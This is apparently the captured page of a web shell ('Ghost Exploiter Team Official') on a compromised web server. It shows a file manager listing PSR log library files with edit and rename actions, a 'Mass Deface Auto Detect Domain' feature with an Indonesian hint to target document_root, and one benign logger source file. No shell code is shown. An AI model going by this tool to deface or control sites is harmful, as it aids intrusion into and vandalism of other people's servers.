Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
psr
/
log
/
src
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
AbstractLogger.php
0.404KB
edt
ren
InvalidArgumentExceptio
...
0.094KB
edt
ren
LogLevel.php
0.328KB
edt
ren
LoggerAwareInterface.php
0.226KB
edt
ren
LoggerAwareTrait.php
0.339KB
edt
ren
LoggerInterface.php
2.705KB
edt
ren
LoggerTrait.php
2.69KB
edt
ren
NullLogger.php
0.628KB
edt
ren
<?php namespace Psr\Log; /** * This is a simple Logger implementation that other Loggers can inherit from. * * It simply delegates all log-level-specific methods to the `log` method to * reduce boilerplate code that a simple Logger that does the same thing with * messages regardless of the error level has to implement. */ abstract class AbstractLogger implements LoggerInterface { use LoggerTrait; }
<=Back
Liking